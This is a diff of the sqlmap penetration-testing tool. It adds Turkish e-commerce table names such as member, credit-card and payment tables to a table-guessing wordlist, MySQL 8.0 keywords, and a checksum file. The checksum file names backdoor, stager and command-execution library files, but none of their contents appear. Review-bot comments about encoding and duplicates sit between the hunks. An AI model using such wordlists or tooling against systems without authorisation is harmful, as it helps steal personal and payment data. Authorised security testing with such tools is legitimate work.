@@ -3420,6 +3420,181 @@ basvuru basvurular kontak kontaklar +kisi +kisiler +uye +uyeler +kayıt +kayıtlar +tel +telefon +telefonlar +numaralar +numara +kart +kartlar +kredi +krediler +kredikartı +fiyat +fiyatlar +odeme +odemeler +kategoriler +tbl_Uye +xml_kategoriler +tbl_siparis +tbl_googlemap +tbl_ilce +tbl_yardim +tbl_Resim +tbl_anket +tbl_Rapor +tbl_statsvisit +tbl_ticket +tbl_Cesit +tbl_xml +tbl_Cinsiyet +xml_urunler_temp +tbl_takvim +tbl_altkategori +tbl_mesaj +tbl_Haber +tbl_AdresTemp +tbl_Firma +tbl_Medya +xml_urunlerbirim +tbl_Yardim +tbl_medya +tbl_Video +xml_markalar_transfer +tbl_adrestemp +tbl_online +tbl_sehir +tbl_resim +tbl_Gorsel +tbl_doviz +tbl_gorsel +tbl_kampanya +tbl_Blog +tbl_Banners +tbl_koleksiyon +tbl_Galeri +tbl_Kampanya +tbl_Favori +tbl_sss +tbl_Banner +tbl_Faq +xml_markalar_temp +tbl_faq +tbl_Personel +tbl_Seo +tbl_adres +tbl_ayar +tbl_metin +tbl_AltKategori +tbl_kategori +tbl_Marka +tbl_blogkategori +tbl_ulke +tbl_sepetold +tbl_yorum +tbl_Fiyat +tbl_Reklam +tbl_Kategori +tbl_Yorum +tbl_semt +tbl_Tedarikci +xml_kampanyakategori +tbl_ozelgun +tbl_uyexml +tbl_rapor +tbl_seo +tbl_Indirim +tbl_Ilce +tbl_bulten +tbl_video +tbl_Ayar +tbl_fatura +tbl_cinsiyet +tbl_reklam +tbl_sliders +tbl_KDV +tbl_uye_img +tbl_siparisid +tbl_BlogKategori +tbl_Yonetici +tbl_kdv +tbl_Online +tbl_temsilci +tbl_Dil +tbl_banners +tbl_Mesaj +tbl_Logs +tbl_logs +tbl_fiyat +tbl_SSS +tbl_Puan +tbl_kargo +tbl_Statsvisit +tbl_Koleksiyon +tbl_dil +tbl_Sepetold +tbl_Fatura +tbl_yonetici +tbl_Yazilar +tbl_Temsilci +tbl_Kargo +tbl_cesit +tbl_uye +tbl_haber +tbl_SiparisID +tbl_Adres +tbl_Ozelgun +tbl_banka +tbl_Videogaleri +tbl_galeri +tbl_videogaleri +xml_urunresimleri +tbl_urun +tbl_Ticket +tbl_yazilar +tbl_Ulke +tbl_Urun +tbl_renk +tbl_Harita +tbl_Sepet +tbl_Sehir +tbl_Uye_Img +tbl_Semt +tbl_indirim +xml_kampanyakategori_transfer +tbl_Takvim +tbl_blog +tbl_Sliders +tbl_Renk +tbl_UyeXML +tbl_tedarikci +tbl_Fotogaleri +tbl_Doviz +tbl_Anket +tbl_Banka +tbl_Metin +tbl_XML 
+tbl_firma +tbl_harita +tbl_banner +tbl_sepet +tbl_fotogaleri +tbl_marka +tbl_Siparis +tbl_personel +tbl_puan +tbl_Bulten +tbl_favori +tbl_onlineusers + + # List provided by Pedrito Perez (0ark1ang3l@gmail.com) @@ -3578,3 +3753,11 @@ users user_usergroup_map viewlevels weblinks + +# site:nl + +gebruikers + +# site:cn + +yonghu diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt index d9e2f543aa7..b280115150e 100644 --- a/data/txt/keywords.txt +++ b/data/txt/keywords.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) 
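Review bot: The block added by `@@ -3420,6 +3420,181 @@` mixes spellings in a way that makes the list depend on encoding and collation. `kayıt`, `kayıtlar` and `kredikartı` use the non-ASCII dotless ı while the neighbouring additions are ASCII transliterations (`uye`, `odeme`), and many `tbl_` names appear twice differing only in case (`tbl_Uye`/`tbl_uye`, `tbl_Yardim`/`tbl_yardim`). Whether the case pairs are distinct identifiers depends on the DBMS collation, and whether the non-ASCII entries match depends on how the file is decoded; neither is visible here. Either normalise the three entries to the ASCII convention used around them, or state the assumption above them with a comment such as `# NOTE: non-ASCII entries below are stored as UTF-8` (encoding to be confirmed against the loader).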
@@ -452,6 +452,762 @@ WRITEXOR YEAR_MONTH ZEROFILL +# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html) + +ACCESSIBLE +ACCOUNT +ACTION +ACTIVE +ADD +ADMIN +AFTER +AGAINST +AGGREGATE +ALGORITHM +ALL +ALTER +ALWAYS +ANALYSE +ANALYZE +AND +ANY +ARRAY +AS +ASC +ASCII +ASENSITIVE +AT +ATTRIBUTE +AUTHENTICATION +AUTOEXTEND_SIZE +AUTO_INCREMENT +AVG +AVG_ROW_LENGTH +BACKUP +BEFORE +BEGIN +BETWEEN +BIGINT +BINARY +BINLOG +BIT +BLOB +BLOCK +BOOL +BOOLEAN +BOTH +BTREE +BUCKETS +BULK +BY +BYTE +CACHE +CALL +CASCADE +CASCADED +CASE +CATALOG_NAME +CHAIN +CHALLENGE_RESPONSE +CHANGE +CHANGED +CHANNEL +CHAR +CHARACTER +CHARSET +CHECK +CHECKSUM +CIPHER +CLASS_ORIGIN +CLIENT +CLONE +CLOSE +COALESCE +CODE +COLLATE +COLLATION +COLUMN +COLUMNS +COLUMN_FORMAT +COLUMN_NAME +COMMENT +COMMIT +COMMITTED +COMPACT +COMPLETION +COMPONENT +COMPRESSED +COMPRESSION +CONCURRENT +CONDITION +CONNECTION +CONSISTENT +CONSTRAINT +CONSTRAINT_CATALOG +CONSTRAINT_NAME +CONSTRAINT_SCHEMA +CONTAINS +CONTEXT +CONTINUE +CONVERT +CPU +CREATE +CROSS +CUBE +CUME_DIST +CURRENT +CURRENT_DATE +CURRENT_TIME +CURRENT_TIMESTAMP +CURRENT_USER +CURSOR +CURSOR_NAME +DATA +DATABASE +DATABASES +DATAFILE +DATE +DATETIME +DAY +DAY_HOUR +DAY_MICROSECOND +DAY_MINUTE +DAY_SECOND +DEALLOCATE +DEC +DECIMAL +DECLARE +DEFAULT +DEFAULT_AUTH +DEFINER +DEFINITION +DELAYED +DELAY_KEY_WRITE +DELETE +DENSE_RANK +DESC +DESCRIBE +DESCRIPTION +DES_KEY_FILE +DETERMINISTIC +DIAGNOSTICS +DIRECTORY +DISABLE +DISCARD +DISK +DISTINCT +DISTINCTROW +DIV +DO +DOUBLE +DROP +DUAL +DUMPFILE +DUPLICATE +DYNAMIC +EACH +ELSE +ELSEIF +EMPTY +ENABLE +ENCLOSED +ENCRYPTION +END +ENDS +ENFORCED +ENGINE +ENGINES +ENGINE_ATTRIBUTE +ENUM +ERROR +ERRORS +ESCAPE +ESCAPED +EVENT +EVENTS +EVERY +EXCEPT +EXCHANGE +EXCLUDE +EXECUTE +EXISTS +EXIT +EXPANSION +EXPIRE +EXPLAIN +EXPORT +EXTENDED +EXTENT_SIZE +FACTOR +FAILED_LOGIN_ATTEMPTS +FALSE +FAST +FAULTS +FETCH +FIELDS +FILE +FILE_BLOCK_SIZE +FILTER +FINISH +FIRST +FIRST_VALUE +FIXED 
+FLOAT
+FLOAT4
+FLOAT8
+FLUSH
+FOLLOWING
+FOLLOWS
+FOR
+FORCE
+FOREIGN
+FORMAT
+FOUND
+FROM
+FULL
+FULLTEXT
+FUNCTION
+GENERAL
+GENERATE
+GENERATED
+GEOMCOLLECTION
+GEOMETRY
+GEOMETRYCOLLECTION
+GET
+GET_FORMAT
+GET_MASTER_PUBLIC_KEY
+GET_SOURCE_PUBLIC_KEY
+GLOBAL
+GRANT
+GRANTS
+GROUP
+GROUPING
+GROUPS
+GROUP_REPLICATION
+GTID_ONLY
+HANDLER
+HASH
+HAVING
+HELP
+HIGH_PRIORITY
+HISTOGRAM
+HISTORY
+HOST
+HOSTS
+HOUR
+HOUR_MICROSECOND
+HOUR_MINUTE
+HOUR_SECOND
+IDENTIFIED
+IF
+IGNORE
+IGNORE_SERVER_IDS
+IMPORT
+IN
+INACTIVE
+INDEX
+INDEXES
+INFILE
+INITIAL
+INITIAL_SIZE
+INITIATE
+INNER
+INOUT
+INSENSITIVE
+INSERT
+INSERT_METHOD
+INSTALL
+INSTANCE
+INT
+INT1
+INT2
+INT3
+INT4
+INT8
+INTEGER
+INTERSECT
+INTERVAL
+INTO
+INVISIBLE
+INVOKER
+IO
+IO_AFTER_GTIDS
+IO_BEFORE_GTIDS
+IO_THREAD
+IPC
+IS
+ISOLATION
+ISSUER
+ITERATE
+JOIN
+JSON
+JSON_TABLE
+JSON_VALUE
+KEY
+KEYRING
+KEYS
+KEY_BLOCK_SIZE
+KILL
+LAG
+LANGUAGE
+LAST
+LAST_VALUE
+LATERAL
+LEAD
+LEADING
+LEAVE
+LEAVES
+LEFT
+LESS
+LEVEL
+LIKE
+LIMIT
+LINEAR
+LINES
+LINESTRING
+LIST
+LOAD
+LOCAL
+LOCALTIME
+LOCALTIMESTAMP
+LOCK
+LOCKED
+LOCKS
+LOGFILE
+LOGS
+LONG
+LONGBLOB
+LONGTEXT
+LOOP
+LOW_PRIORITY
+MASTER
+MASTER_AUTO_POSITION
+MASTER_BIND
+MASTER_COMPRESSION_ALGORITHMS
+MASTER_CONNECT_RETRY
+MASTER_DELAY
+MASTER_HEARTBEAT_PERIOD
+MASTER_HOST
+MASTER_LOG_FILE
+MASTER_LOG_POS
+MASTER_PASSWORD
+MASTER_PORT
+MASTER_PUBLIC_KEY_PATH
+MASTER_RETRY_COUNT
+MASTER_SERVER_ID
+MASTER_SSL
+MASTER_SSL_CA
+MASTER_SSL_CAPATH
+MASTER_SSL_CERT
+MASTER_SSL_CIPHER
+MASTER_SSL_CRL
+MASTER_SSL_CRLPATH
+MASTER_SSL_KEY
+MASTER_SSL_VERIFY_SERVER_CERT
+MASTER_TLS_CIPHERSUITES
+MASTER_TLS_VERSION
+MASTER_USER
+MASTER_ZSTD_COMPRESSION_LEVEL
+MATCH
+MAXVALUE
+MAX_CONNECTIONS_PER_HOUR
+MAX_QUERIES_PER_HOUR
+MAX_ROWS
+MAX_SIZE
+MAX_UPDATES_PER_HOUR
+MAX_USER_CONNECTIONS
+MEDIUM
+MEDIUMBLOB
+MEDIUMINT
+MEDIUMTEXT
+MEMBER
+MEMORY
+MERGE
+MESSAGE_TEXT
+MICROSECOND
+MIDDLEINT
+MIGRATE
+MINUTE
+MINUTE_MICROSECOND
+MINUTE_SECOND
+MIN_ROWS
+MOD
+MODE
+MODIFIES
+MODIFY
+MONTH
+MULTILINESTRING
+MULTIPOINT
+MULTIPOLYGON
+MUTEX
+MYSQL_ERRNO
+NAME
+NAMES
+NATIONAL
+NATURAL
+NCHAR
+NDB
+NDBCLUSTER
+NESTED
+NETWORK_NAMESPACE
+NEVER
+NEW
+NEXT
+NO
+NODEGROUP
+NONE
+NOT
+NOWAIT
+NO_WAIT
+NO_WRITE_TO_BINLOG
+NTH_VALUE
+NTILE
+NULL
+NULLS
+NUMBER
+NUMERIC
+NVARCHAR
+OF
+OFF
+OFFSET
+OJ
+OLD
+ON
+ONE
+ONLY
+OPEN
+OPTIMIZE
+OPTIMIZER_COSTS
+OPTION
+OPTIONAL
+OPTIONALLY
+OPTIONS
+OR
+ORDER
+ORDINALITY
+ORGANIZATION
+OTHERS
+OUT
+OUTER
+OUTFILE
+OVER
+OWNER
+PACK_KEYS
+PAGE
+PARSER
+PARTIAL
+PARTITION
+PARTITIONING
+PARTITIONS
+PASSWORD_LOCK_TIME
+PATH
+PERCENT_RANK
+PERSIST
+PERSIST_ONLY
+PHASE
+PLUGIN
+PLUGINS
+PLUGIN_DIR
+POINT
+POLYGON
+PORT
+PRECEDES
+PRECEDING
+PRECISION
+PREPARE
+PRESERVE
+PREV
+PRIMARY
+PRIVILEGES
+PRIVILEGE_CHECKS_USER
+PROCEDURE
+PROCESS
+PROCESSLIST
+PROFILE
+PROFILES
+PROXY
+PURGE
+QUARTER
+QUERY
+QUICK
+RANDOM
+RANGE
+RANK
+READ
+READS
+READ_ONLY
+READ_WRITE
+REAL
+REBUILD
+RECOVER
+RECURSIVE
+REDOFILE
+REDO_BUFFER_SIZE
+REDUNDANT
+REFERENCE
+REFERENCES
+REGEXP
+REGISTRATION
+RELAY
+RELAYLOG
+RELAY_LOG_FILE
+RELAY_LOG_POS
+RELAY_THREAD
+RELEASE
+RELOAD
+REMOTE
+REMOVE
+RENAME
+REORGANIZE
+REPAIR
+REPEAT
+REPEATABLE
+REPLACE
+REPLICA
+REPLICAS
+REPLICATE_DO_DB
+REPLICATE_DO_TABLE
+REPLICATE_IGNORE_DB
+REPLICATE_IGNORE_TABLE
+REPLICATE_REWRITE_DB
+REPLICATE_WILD_DO_TABLE
+REPLICATE_WILD_IGNORE_TABLE
+REPLICATION
+REQUIRE
+REQUIRE_ROW_FORMAT
+RESET
+RESIGNAL
+RESOURCE
+RESPECT
+RESTART
+RESTORE
+RESTRICT
+RESUME
+RETAIN
+RETURN
+RETURNED_SQLSTATE
+RETURNING
+RETURNS
+REUSE
+REVERSE
+REVOKE
+RIGHT
+RLIKE
+ROLE
+ROLLBACK
+ROLLUP
+ROTATE
+ROUTINE
+ROW
+ROWS
+ROW_COUNT
+ROW_FORMAT
+ROW_NUMBER
+RTREE
+SAVEPOINT
+SCHEDULE
+SCHEMA
+SCHEMAS
+SCHEMA_NAME
+SECOND
+SECONDARY
+SECONDARY_ENGINE
+SECONDARY_ENGINE_ATTRIBUTE
+SECONDARY_LOAD
+SECONDARY_UNLOAD
+SECOND_MICROSECOND
+SECURITY
+SELECT
+SENSITIVE
+SEPARATOR
+SERIAL
+SERIALIZABLE
+SERVER
+SESSION
+SET
+SHARE
+SHOW
+SHUTDOWN
+SIGNAL
+SIGNED
+SIMPLE
+SKIP
+SLAVE +SLOW +SMALLINT +SNAPSHOT +SOCKET +SOME +SONAME +SOUNDS +SOURCE +SOURCE_AUTO_POSITION +SOURCE_BIND +SOURCE_COMPRESSION_ALGORITHMS +SOURCE_CONNECT_RETRY +SOURCE_DELAY +SOURCE_HEARTBEAT_PERIOD +SOURCE_HOST +SOURCE_LOG_FILE +SOURCE_LOG_POS +SOURCE_PASSWORD +SOURCE_PORT +SOURCE_PUBLIC_KEY_PATH +SOURCE_RETRY_COUNT +SOURCE_SSL +SOURCE_SSL_CA +SOURCE_SSL_CAPATH +SOURCE_SSL_CERT +SOURCE_SSL_CIPHER +SOURCE_SSL_CRL +SOURCE_SSL_CRLPATH +SOURCE_SSL_KEY +SOURCE_SSL_VERIFY_SERVER_CERT +SOURCE_TLS_CIPHERSUITES +SOURCE_TLS_VERSION +SOURCE_USER +SOURCE_ZSTD_COMPRESSION_LEVEL +SPATIAL +SPECIFIC +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQL_AFTER_GTIDS +SQL_AFTER_MTS_GAPS +SQL_BEFORE_GTIDS +SQL_BIG_RESULT +SQL_BUFFER_RESULT +SQL_CACHE +SQL_CALC_FOUND_ROWS +SQL_NO_CACHE +SQL_SMALL_RESULT +SQL_THREAD +SQL_TSI_DAY +SQL_TSI_HOUR +SQL_TSI_MINUTE +SQL_TSI_MONTH +SQL_TSI_QUARTER +SQL_TSI_SECOND +SQL_TSI_WEEK +SQL_TSI_YEAR +SRID +SSL +STACKED +START +STARTING +STARTS +STATS_AUTO_RECALC +STATS_PERSISTENT +STATS_SAMPLE_PAGES +STATUS +STOP +STORAGE +STORED +STRAIGHT_JOIN +STREAM +STRING +SUBCLASS_ORIGIN +SUBJECT +SUBPARTITION +SUBPARTITIONS +SUPER +SUSPEND +SWAPS +SWITCHES +SYSTEM +TABLE +TABLES +TABLESPACE +TABLE_CHECKSUM +TABLE_NAME +TEMPORARY +TEMPTABLE +TERMINATED +TEXT +THAN +THEN +THREAD_PRIORITY +TIES +TIME +TIMESTAMP +TIMESTAMPADD +TIMESTAMPDIFF +TINYBLOB +TINYINT +TINYTEXT +TLS +TO +TRAILING +TRANSACTION +TRIGGER +TRIGGERS +TRUE +TRUNCATE +TYPE +TYPES +UNBOUNDED +UNCOMMITTED +UNDEFINED +UNDO +UNDOFILE +UNDO_BUFFER_SIZE +UNICODE +UNINSTALL +UNION +UNIQUE +UNKNOWN +UNLOCK +UNREGISTER +UNSIGNED +UNTIL +UPDATE +UPGRADE +URL +USAGE +USE +USER +USER_RESOURCES +USE_FRM +USING +UTC_DATE +UTC_TIME +UTC_TIMESTAMP +VALIDATION +VALUE +VALUES +VARBINARY +VARCHAR +VARCHARACTER +VARIABLES +VARYING +VCPU +VIEW +VIRTUAL +VISIBLE +WAIT +WARNINGS +WEEK +WEIGHT_STRING +WHEN +WHERE +WHILE +WINDOW +WITH +WITHOUT +WORK +WRAPPER +WRITE +X509 +XA +XID +XML +XOR +YEAR +YEAR_MONTH +ZEROFILL +ZONE + # 
PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html) ABS @@ -872,3 +1628,8 @@ XMLTABLE XMLTEXT XMLVALIDATE YEAR + +# Misc + +ORD +MID diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt new file mode 100644 index 00000000000..5fa53a29f92 --- /dev/null +++ b/data/txt/sha256sums.txt 
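Review bot: The new `# MySQL 8.0 keywords` section repeats words the file already holds: the context lines just above the insertion point end with `YEAR_MONTH` and `ZEROFILL`, and the added block ends with the same two before `ZONE`. If the list is loaded into a set the overlap is harmless, but the loader is not visible from this hunk, and a reader cannot tell whether the older section is meant to be superseded. A one-line comment under the new header, e.g. `# (overlaps the section above; duplicates are intentional)`, or removing the superseded entries in the same commit, would make the intent explicit.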
@@ -0,0 +1,630 @@ +39a8a35d730f49daf657fa58903a9cd309813b275df29a86439297a10a15261a data/html/index.html +e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18 data/procs/mssqlserver/activate_sp_oacreate.sql +6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120 data/procs/mssqlserver/configure_openrowset.sql +798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad data/procs/mssqlserver/configure_xp_cmdshell.sql +5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421 data/procs/mssqlserver/create_new_xp_cmdshell.sql +3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0 data/procs/mssqlserver/disable_xp_cmdshell_2000.sql +afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4 data/procs/mssqlserver/dns_request.sql +657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2 data/procs/mssqlserver/enable_xp_cmdshell_2000.sql +1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d data/procs/mssqlserver/run_statement_as_user.sql +9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf data/procs/mysql/dns_request.sql +02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb data/procs/mysql/write_file_limit.sql +02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900 data/procs/oracle/dns_request.sql +606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117 data/procs/oracle/read_file_export_extension.sql +4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb data/procs/postgresql/dns_request.sql +7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137 data/procs/README.txt +3fa42f7428a91d94e792ad8d3cb76109cfe2632d918ae046e32be5a2b51ad3d8 data/shell/backdoors/backdoor.asp_ +7943c1d1e8c037f5466f90ed91cc88441beb0efab83ef5ae98473d2aee770b65 data/shell/backdoors/backdoor.aspx_ +9d9d0bdd4145df96058977a39be924f0facdba9efa7b585848101dafbcb7b02e data/shell/backdoors/backdoor.jsp_ +8a7a73a4c841e92ece79942e03a18df046f90ba43e6af6c4f8fbb77f437bce07 
data/shell/backdoors/backdoor.php_ +a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64 data/shell/README.txt +67ce7eec132297594f7fd31f93f8d044df3d745c01c70c5afc320848eb4aa149 data/shell/stagers/stager.asp_ +099eb0f9ed71946eb55bd1d4afa1f1f7ef9f39cc41af4897f3d5139524bd2fc2 data/shell/stagers/stager.aspx_ +f2648a0cb4d5922d58b8aa6600f786b32324b9ac91e3a57e4ff212e901ffe151 data/shell/stagers/stager.jsp_ +84b431647a2c13e72b2c9c9242a578349d1b8eef596166128e08f1056d7e4ac8 data/shell/stagers/stager.php_ +26e2a6d6154cbcef1410a6826169463129380f70a840f848dce4236b686efb23 data/txt/common-columns.txt +22cda9937e1801f15370e7cb784797f06c9c86ad8a97db19e732ae76671c7f37 data/txt/common-files.txt +a166b1958937364968a25e4bc64074c1ac12358443e58b1bf2ac3d8d88b48a30 data/txt/common-outputs.txt +7953f5967da237115739ee0f0fe8b0ecec7cdac4830770acb8238e6570422a28 data/txt/common-tables.txt +b023d7207e5e96a27696ec7ea1d32f9de59f1a269fde7672a8509cb3f0909cd3 data/txt/keywords.txt +29a0a6a2c2d94e44899e867590bae865bdf97ba17484c649002d1d8faaf3e127 data/txt/smalldict.txt +df66c8fdb08cc0eee63b86505bc5b05bc4cad5d0bef6553d5c20346e7202dc2b data/txt/user-agents.txt +9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6 data/txt/wordlist.tx_ +849c61612bd0d773971254df2cc76cc18b3d2db4051a8f508643278a166df44e data/udf/mysql/linux/32/lib_mysqludf_sys.so_ +20b5a80b8044da1a0d5c5343c6cbc5b71947c5464e088af466a3fcd89c2881ef data/udf/mysql/linux/64/lib_mysqludf_sys.so_ +8e6ae0e3d67e47261df064aa1536f99e56d4f001cc7f800c3d93b091c3c73115 data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ +51d055d00863655e43e683377257953a19728a0ae9a3fe406768289474eb4104 data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ +9340f3d10dcca0d72e707f22cf1c4c6581b979c23d6f55a417ee41d9091bb9d1 data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ +dc1199c029dff238e971fd3250916eb48503daa259464c24f22cd2cd51f5ccd8 data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ 
+0b6a7e34fbbd27adaa8beda36ce20e93fd65b8e3ce93bf44703c514ebdd1cef0 data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ +922fb68413b05031e9237414cf50a04e0e43f0d1c7ef44cfb77305eea0b6f2fe data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ +029ffa3b30a4c6cb10f5271b72c2a6b8967cdab0d23c8e4b0e5e75e2a5c734f2 data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ +52f9a6375099cb9c37ca1b8596c2e89a75ed6b8a2493b486ef3cd0230eaa6591 data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ +436e0bf6961f4d25321a6fe97bfa73ab2926175d5b93e9c4b0dbcd38a926ca31 data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ +6817b485450aed7a634ece8c6c12007ab38e6954c8cbc7a530b101347e788cbc data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ +a2de5ca53411f38dadc1535a58d7416a3758a126feec6becb4e0e33c974825f3 data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ +17e2f86c94b4cffb8de37b10456142f5a1bf3d500345bf508f16c9a359fbf005 data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ +5ffdaac7d85ac18e5bbae2776522d391d92ca18b2862c3d1d03fa90effcfb918 data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ +5fae599c42bb650a2c0ba8111ca64d52bb82ac1ea0e982a3c0f59587d166eb5b data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ +ded0da0260fea0c91e02839d2e06e62741cc25ac5d74b351b0a26e0c0abcd8de data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ +81e9f38cb47753f5b9f472eddd227023c44f6b302b7c03eca65dd9836856de69 data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ +87b0d86661eaf8bf58664a3aa241cc33525cf3dc1043ed60a82cf123d8ae3873 data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ +925a7b8a3904906b8402e707ed510e9ac7598ee30a90f5464d14a3678998cb90 data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ +c55ac17eaf8f4353ac1abbecb3165ebfceeed438780f9c1d8eb863a6f40d64f4 data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ +aecdef1198ad2bdfdebc82ba001b6d6c2d08cc162271a37d0a55ae8e5a0e3aa0 data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ 
+f128717b9930c4fd919da004dacc50487923d56239a68a2566d33212acc09839 data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ +965355721e6d5ada50e3f0fe576f668ee62adae0810a34c8024fb40c5301443b data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ +adfb9f1841af68b03f7dfe68234236034cb09d6be28902eda7d66792b667b58a data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ +b0d30e633532c28f693fbb91a67274b3d347cbefa0dfae8d6dafa2b934d9be14 data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ +7acbfe3ddd2d0083fe5d6a9f614008b0659539a5401bdf99d9bcd3667901e4dc data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ +191dc3607fdb4bad4e4231fd0d63c5926aa4055df024a083ea0ec0bbec6e3258 data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ +a6717d5da8c4515f9b53bcd2343a4d496dbdcf92c5b05e210f62731e2fa89ce7 data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ +611e1f025b919a75ec9543720cac4b02669967dab46e671f0328e75314852951 data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ +b427b65cc8b585cd02361f5155ffab2fe52fd5943100382c6b86cd0f52f352d9 data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ +c444fd667a09927a22c92e855d206249e761c1fbd4f3630f7ee06265eb2576ee data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ +c6be099a5dee34f3a7570715428add2e7419f4e73a7ce9913d3fb76eea78d88e data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ +0a6d5fc399e9958477c8a71f63b7c7884567204253e0d2389a240d83ed83f241 data/udf/README.txt +4e268596da67fb0b6a10a7cefb38af5de13f67dab760cc0505f8f80484a0fe79 data/xml/banner/generic.xml +2adcdd08d2c11a5a23777b10c132164ed9e856f2a4eca2f75e5e9b6615d26a97 data/xml/banner/mssql.xml +14b18da611d4bfad50341df89f893edf47cd09c41c9662e036e817055eaa0cfb data/xml/banner/mysql.xml +6d1ab53eeac4fae6d03b67fb4ada71b915e1446a9c1cc4d82eafc032800a68fd data/xml/banner/oracle.xml +9f4ca1ff145cfbe3c3a903a21bf35f6b06ab8b484dad6b7c09e95262bf6bfa05 data/xml/banner/postgresql.xml 
+86da6e90d9ccf261568eda26a6455da226c19a42cc7cd211e379cab528ec621e data/xml/banner/server.xml +146887f28e3e19861516bca551e050ce81a1b8d6bb69fd342cc1f19a25849328 data/xml/banner/servlet-engine.xml +e87c062bdf05b27db6c1d7e0d41c25f269cbe66b1f9b8e2d9b3db0d567016c76 data/xml/banner/set-cookie.xml +a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea data/xml/banner/sharepoint.xml +e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18 data/xml/banner/x-aspnet-version.xml +75672f8faa8053af0df566a48700f2178075f67c593d916313fcff3474da6f82 data/xml/banner/x-powered-by.xml +1ac399c49ce3cb8c0812bb246e60c8a6718226efe89ccd1f027f49a18dbeb634 data/xml/boundaries.xml +20fd2f2ba35ade45f242bd3c6e92898ac90b4ee6a63dbb8740cad06f91a395e5 data/xml/errors.xml +cfa1f0557fb71be0631796a4848d17be536e38f94571cf6ef911454fbc6b30d1 data/xml/payloads/boolean_blind.xml +f2b711ea18f20239ba9902732631684b61106d4a4271669125a4cf41401b3eaf data/xml/payloads/error_based.xml +b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609 data/xml/payloads/inline_query.xml +0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689 data/xml/payloads/stacked_queries.xml +997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1 data/xml/payloads/time_blind.xml +40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089 data/xml/payloads/union_query.xml +95b7464b1a7b75e2b462d73c6cca455c13b301f50182a8b2cd6701cdcb80b43e data/xml/queries.xml +abb6261b1c531ad2ee3ada8184c76bcdc38732558d11a8e519f36fcc95325f7e doc/AUTHORS +2a0322f121cbda30336ab58382e9860fea8ab28ff4726f6f8abf143ce1657abe doc/CHANGELOG.md +2df1f15110f74ce4e52f0e7e4a605e6c7e08fbda243e444f9b60e26dfc5cf09d doc/THANKS.md +f939c6341e3ab16b0bb9d597e4b13856c7d922be27fd8dba3aa976b347771f16 doc/THIRD-PARTY.md +3a8d6530c3aa16938078ee5f0e25178e8ce92758d3bad5809f800aded24c9633 doc/translations/README-ar-AR.md +d739d4ced220b342316f5814216bdb1cb85609cd5ebb89e606478ac43301009e doc/translations/README-bg-BG.md 
